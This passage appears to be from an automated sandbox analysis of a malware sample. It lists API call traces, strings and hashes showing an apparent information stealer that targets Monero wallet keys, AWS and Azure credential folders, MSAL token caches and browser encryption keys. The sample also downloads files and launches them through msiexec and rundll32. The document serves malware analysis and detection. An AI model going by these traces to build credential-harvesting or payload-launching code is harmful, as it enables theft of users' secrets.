                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                  • Part of subcall function 008C8B60: GetSystemTime.KERNEL32(008D0E1A,007BCF28,008D05AE,?,?,008B13F9,?,0000001A,008D0E1A,00000000,?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008C8B86
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008BCF83
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 008BD0C7
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008BD0CE
                                • lstrcat.KERNEL32(?,00000000), ref: 008BD208
                                • lstrcat.KERNEL32(?,008D1478), ref: 008BD217
                                • lstrcat.KERNEL32(?,00000000), ref: 008BD22A
                                • lstrcat.KERNEL32(?,008D147C), ref: 008BD239
                                • lstrcat.KERNEL32(?,00000000), ref: 008BD24C
                                • lstrcat.KERNEL32(?,008D1480), ref: 008BD25B
                                • lstrcat.KERNEL32(?,00000000), ref: 008BD26E
                                • lstrcat.KERNEL32(?,008D1484), ref: 008BD27D
                                • lstrcat.KERNEL32(?,00000000), ref: 008BD290
                                • lstrcat.KERNEL32(?,008D1488), ref: 008BD29F
                                • lstrcat.KERNEL32(?,00000000), ref: 008BD2B2
                                • lstrcat.KERNEL32(?,008D148C), ref: 008BD2C1
                                • lstrcat.KERNEL32(?,00000000), ref: 008BD2D4
                                • lstrcat.KERNEL32(?,008D1490), ref: 008BD2E3
                                  • Part of subcall function 008CA820: lstrlen.KERNEL32(008B4F05,?,?,008B4F05,008D0DDE), ref: 008CA82B
                                  • Part of subcall function 008CA820: lstrcpy.KERNEL32(008D0DDE,00000000), ref: 008CA885
                                • lstrlen.KERNEL32(?), ref: 008BD32A
                                • lstrlen.KERNEL32(?), ref: 008BD339
                                  • Part of subcall function 008CAA70: StrCmpCA.SHLWAPI(007B89A8,008BA7A7,?,008BA7A7,007B89A8), ref: 008CAA8F
                                • DeleteFileA.KERNEL32(00000000), ref: 008BD3B4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                • String ID:
                                • API String ID: 1956182324-0
                                • Opcode ID: dfec379a04aaf6c49f8e7e3d3177e299de93b55bf80d082295c7b0e01d31e69d
                                • Instruction ID: 0843b357d05a25857e1a20e3b6c35b94affe6ed0614d0a6f06743642300d2726
                                • Opcode Fuzzy Hash: dfec379a04aaf6c49f8e7e3d3177e299de93b55bf80d082295c7b0e01d31e69d
                                • Instruction Fuzzy Hash: 34E1EFB1910108ABCB08EBE4DD96EEE7379FF14305F104169F506E6191DE35AE0ACBA7
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,007BC4B0,00000000,?,008D144C,00000000,?,?), ref: 008BCA6C
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 008BCA89
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 008BCA95
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 008BCAA8
                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 008BCAD9
                                • StrStrA.SHLWAPI(?,007BC408,008D0B52), ref: 008BCAF7
                                • StrStrA.SHLWAPI(00000000,007BC3F0), ref: 008BCB1E
                                • StrStrA.SHLWAPI(?,007BD1A0,00000000,?,008D1458,00000000,?,00000000,00000000,?,007B8A58,00000000,?,008D1454,00000000,?), ref: 008BCCA2
                                • StrStrA.SHLWAPI(00000000,007BD260), ref: 008BCCB9
                                  • Part of subcall function 008BC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 008BC871
                                  • Part of subcall function 008BC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 008BC87C
                                • StrStrA.SHLWAPI(?,007BD260,00000000,?,008D145C,00000000,?,00000000,007B8B68), ref: 008BCD5A
                                • StrStrA.SHLWAPI(00000000,007B8848), ref: 008BCD71
                                  • Part of subcall function 008BC820: lstrcat.KERNEL32(?,008D0B46), ref: 008BC943
                                  • Part of subcall function 008BC820: lstrcat.KERNEL32(?,008D0B47), ref: 008BC957
                                  • Part of subcall function 008BC820: lstrcat.KERNEL32(?,008D0B4E), ref: 008BC978
                                • lstrlen.KERNEL32(00000000), ref: 008BCE44
                                • CloseHandle.KERNEL32(00000000), ref: 008BCE9C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                • String ID:
                                • API String ID: 3744635739-3916222277
                                • Opcode ID: fb755dc1e50e01d16b649db9f86a53836337a863d0480527db6dcd2fb66279ec
                                • Instruction ID: 0cb12760c3625574edec094c5d47f8cf306a23cc6539aebc8865256e2836a89b
                                • Opcode Fuzzy Hash: fb755dc1e50e01d16b649db9f86a53836337a863d0480527db6dcd2fb66279ec
                                • Instruction Fuzzy Hash: 90E1CC71900108ABDB18EBE8DC96FEEB778FF14304F40416DF506A6191DF34AA4ACB66
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                • RegOpenKeyExA.ADVAPI32(00000000,007BA180,00000000,00020019,00000000,008D05B6), ref: 008C83A4
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 008C8426
                                • wsprintfA.USER32 ref: 008C8459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 008C847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 008C848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 008C8499
                                  • Part of subcall function 008CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008CA7E6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenlstrcpy$Enumwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 3246050789-3278919252
                                • Opcode ID: 5e5ba61d40d35f83e3d75ee7a7013c4278daef9e1e2ba9f28dea17d6786428f2
                                • Instruction ID: bb8a93c2477e6991b54d87b897251c5ffbed99ca625da533b34ebe1628517e78
                                • Opcode Fuzzy Hash: 5e5ba61d40d35f83e3d75ee7a7013c4278daef9e1e2ba9f28dea17d6786428f2
                                • Instruction Fuzzy Hash: 7F811CB191011C9BDB28DB94DC95FEAB7B8FF18704F008299E10AE6140DF74AB86CF95
                                APIs
                                  • Part of subcall function 008C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008C8E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 008C4DB0
                                • lstrcat.KERNEL32(?,\.azure\), ref: 008C4DCD
                                  • Part of subcall function 008C4910: wsprintfA.USER32 ref: 008C492C
                                  • Part of subcall function 008C4910: FindFirstFileA.KERNEL32(?,?), ref: 008C4943
                                • lstrcat.KERNEL32(?,00000000), ref: 008C4E3C
                                • lstrcat.KERNEL32(?,\.aws\), ref: 008C4E59
                                  • Part of subcall function 008C4910: StrCmpCA.SHLWAPI(?,008D0FDC), ref: 008C4971
                                  • Part of subcall function 008C4910: StrCmpCA.SHLWAPI(?,008D0FE0), ref: 008C4987
                                  • Part of subcall function 008C4910: FindNextFileA.KERNEL32(000000FF,?), ref: 008C4B7D
                                  • Part of subcall function 008C4910: FindClose.KERNEL32(000000FF), ref: 008C4B92
                                • lstrcat.KERNEL32(?,00000000), ref: 008C4EC8
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 008C4EE5
                                  • Part of subcall function 008C4910: wsprintfA.USER32 ref: 008C49B0
                                  • Part of subcall function 008C4910: StrCmpCA.SHLWAPI(?,008D08D2), ref: 008C49C5
                                  • Part of subcall function 008C4910: wsprintfA.USER32 ref: 008C49E2
                                  • Part of subcall function 008C4910: PathMatchSpecA.SHLWAPI(?,?), ref: 008C4A1E
                                  • Part of subcall function 008C4910: lstrcat.KERNEL32(?,007BE130), ref: 008C4A4A
                                  • Part of subcall function 008C4910: lstrcat.KERNEL32(?,008D0FF8), ref: 008C4A5C
                                  • Part of subcall function 008C4910: lstrcat.KERNEL32(?,?), ref: 008C4A70
                                  • Part of subcall function 008C4910: lstrcat.KERNEL32(?,008D0FFC), ref: 008C4A82
                                  • Part of subcall function 008C4910: lstrcat.KERNEL32(?,?), ref: 008C4A96
                                  • Part of subcall function 008C4910: CopyFileA.KERNEL32(?,?,00000001), ref: 008C4AAC
                                  • Part of subcall function 008C4910: DeleteFileA.KERNEL32(?), ref: 008C4B31
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 949356159-974132213
                                • Opcode ID: 5f427ca85ce5f2227618ba26d4b5fcdfe2ff6ca6eb366addb162c81001691ab3
                                • Instruction ID: 7040271a2d23092304bf9cd5a44cee26f77c72a47c5db27269c5d5be02fcec35
                                • Opcode Fuzzy Hash: 5f427ca85ce5f2227618ba26d4b5fcdfe2ff6ca6eb366addb162c81001691ab3
                                • Instruction Fuzzy Hash: 1D4183B994021867CB14F7A0EC97FE93738FB24744F404558B149D62C1EEB49BC98B93
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 008C906C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateGlobalStream
                                • String ID: image/jpeg
                                • API String ID: 2244384528-3785015651
                                • Opcode ID: 67184aa814f6f0de5b7b5af360b9884bad425f2b70d6b5706a4ea6ce54cf9d73
                                • Instruction ID: 1069c4ad24a1ecd0f6e915dbe842a80a8845386310926cd5a17089db7d8f27d5
                                • Opcode Fuzzy Hash: 67184aa814f6f0de5b7b5af360b9884bad425f2b70d6b5706a4ea6ce54cf9d73
                                • Instruction Fuzzy Hash: 0C71CBB1910208ABDB14EBE4DC99FEEB7B8FB58700F108518F559EB290DB74E905CB61
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                • ShellExecuteEx.SHELL32(0000003C), ref: 008C31C5
                                • ShellExecuteEx.SHELL32(0000003C), ref: 008C335D
                                • ShellExecuteEx.SHELL32(0000003C), ref: 008C34EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                 • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell$lstrcpy
                                • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                • API String ID: 2507796910-3625054190
                                • Opcode ID: 0c1626017cdc957ca68148d003ad2c931e2ac34a0eef722ef695848595411d05
                                • Instruction ID: 892d2360721ee4efb8d1ff6b7aa226d29172b804b7dfc6590671a4d3ad9b9923
                                • Opcode Fuzzy Hash: 0c1626017cdc957ca68148d003ad2c931e2ac34a0eef722ef695848595411d05
                                • Instruction Fuzzy Hash: AE12D97181010C9BDB19EBA4DC92FEDB738FF14304F50816DE506A6191EF34AA4ACFA6
                                APIs
                                  • Part of subcall function 008CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008CA7E6
                                  • Part of subcall function 008B6280: InternetOpenA.WININET(008D0DFE,00000001,00000000,00000000,00000000), ref: 008B62E1
                                  • Part of subcall function 008B6280: StrCmpCA.SHLWAPI(?,007BE270), ref: 008B6303
                                  • Part of subcall function 008B6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008B6335
                                  • Part of subcall function 008B6280: HttpOpenRequestA.WININET(00000000,GET,?,007BD9C8,00000000,00000000,00400100,00000000), ref: 008B6385
                                  • Part of subcall function 008B6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008B63BF
                                  • Part of subcall function 008B6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008B63D1
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008C5318
                                • lstrlen.KERNEL32(00000000), ref: 008C532F
                                  • Part of subcall function 008C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008C8E52
                                • StrStrA.SHLWAPI(00000000,00000000), ref: 008C5364
                                • lstrlen.KERNEL32(00000000), ref: 008C5383
                                • lstrlen.KERNEL32(00000000), ref: 008C53AE
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                 • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 3240024479-1526165396
                                • Opcode ID: 775a92333bc021c9bdb0668d7974b0970a28289713d02b26858cbb2113e84ba5
                                • Instruction ID: 984abf2343edc297196065db26a2e6ad7557e470b408f59727a6c86c55d66453
                                • Opcode Fuzzy Hash: 775a92333bc021c9bdb0668d7974b0970a28289713d02b26858cbb2113e84ba5
                                • Instruction Fuzzy Hash: 1251977091014C9BDB18FFA8D996FED7779FF50304F504128E40ADA592EF34AA46CAA3
                                APIs
                                  • Part of subcall function 008CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008CA7E6
                                  • Part of subcall function 008B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008B4839
                                  • Part of subcall function 008B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 008B4849
                                • InternetOpenA.WININET(008D0DF7,00000001,00000000,00000000,00000000), ref: 008B610F
                                • StrCmpCA.SHLWAPI(?,007BE270), ref: 008B6147
                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 008B618F
                                • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 008B61B3
                                • InternetReadFile.WININET(?,?,00000400,?), ref: 008B61DC
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 008B620A
                                • CloseHandle.KERNEL32(?,?,00000400), ref: 008B6249
                                • InternetCloseHandle.WININET(?), ref: 008B6253
                                • InternetCloseHandle.WININET(00000000), ref: 008B6260
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                 • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                • String ID: p{
                                • API String ID: 2507841554-3914500048
                                • Opcode ID: 9c123ef3fbf5124b326b86a23bdce6ced3bb806173beba89185e684539159f7a
                                • Instruction ID: 8847aac79801926378299db0cb00c15719e99f352e339cb65e67187ec2d23aca
                                • Opcode Fuzzy Hash: 9c123ef3fbf5124b326b86a23bdce6ced3bb806173beba89185e684539159f7a
                                • Instruction Fuzzy Hash: 685131B1940218ABDB24DF94DC45FEE77B8FB44705F108098A609E72C1EB74AA85CF96
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                 • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: d03c0dcb82437d35d88597ceaa8b89c87d28979cc8724289ea46b536c529319c
                                • Instruction ID: 5c95493a012cef7895eb9752c61ad947ea0c447a581a93fc0b8554cf07d70301
                                • Opcode Fuzzy Hash: d03c0dcb82437d35d88597ceaa8b89c87d28979cc8724289ea46b536c529319c
                                • Instruction Fuzzy Hash: BBC171B594021D9BCB18EFA4DCC9FEA7778FB64304F00459DE50AA7241DA70EA85CF92
                                APIs
                                  • Part of subcall function 008C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008C8E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 008C42EC
                                • lstrcat.KERNEL32(?,007BDF38), ref: 008C430B
                                • lstrcat.KERNEL32(?,?), ref: 008C431F
                                • lstrcat.KERNEL32(?,007BC5B8), ref: 008C4333
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008C8D90: GetFileAttributesA.KERNEL32(00000000,?,008B1B54,?,?,008D564C,?,?,008D0E1F), ref: 008C8D9F
                                  • Part of subcall function 008B9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 008B9D39
                                  • Part of subcall function 008B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008B99EC
                                  • Part of subcall function 008B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 008B9A11
                                  • Part of subcall function 008B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 008B9A31
                                  • Part of subcall function 008B99C0: ReadFile.KERNEL32(000000FF,?,00000000,008B148F,00000000), ref: 008B9A5A
                                  • Part of subcall function 008B99C0: LocalFree.KERNEL32(008B148F), ref: 008B9A90
                                  • Part of subcall function 008B99C0: CloseHandle.KERNEL32(000000FF), ref: 008B9A9A
                                  • Part of subcall function 008C93C0: GlobalAlloc.KERNEL32(00000000,008C43DD,008C43DD), ref: 008C93D3
                                • StrStrA.SHLWAPI(?,007BDFB0), ref: 008C43F3
                                • GlobalFree.KERNEL32(?), ref: 008C4512
                                  • Part of subcall function 008B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008B4EEE,00000000,00000000), ref: 008B9AEF
                                  • Part of subcall function 008B9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,008B4EEE,00000000,?), ref: 008B9B01
                                  • Part of subcall function 008B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008B4EEE,00000000,00000000), ref: 008B9B2A
                                  • Part of subcall function 008B9AC0: LocalFree.KERNEL32(?,?,?,?,008B4EEE,00000000,?), ref: 008B9B3F
                                • lstrcat.KERNEL32(?,00000000), ref: 008C44A3
                                • StrCmpCA.SHLWAPI(?,008D08D1), ref: 008C44C0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 008C44D2
                                • lstrcat.KERNEL32(00000000,?), ref: 008C44E5
                                • lstrcat.KERNEL32(00000000,008D0FB8), ref: 008C44F4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                 • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                • String ID:
                                • API String ID: 3541710228-0
                                • Opcode ID: aed9db69cb5ceb8f1fc61a573e4dac07dff30461cbe60bd6d2bcf8c29a976216
                                • Instruction ID: 39bd352c1e116c779b46d24d58a57b939d750519ea14ed893b14d10c51e25828
                                • Opcode Fuzzy Hash: aed9db69cb5ceb8f1fc61a573e4dac07dff30461cbe60bd6d2bcf8c29a976216
                                • Instruction Fuzzy Hash: EE7123B6900208ABCB14EBE4DC99FEE7779FB58300F004598E609D7181DA75DB49CBA2
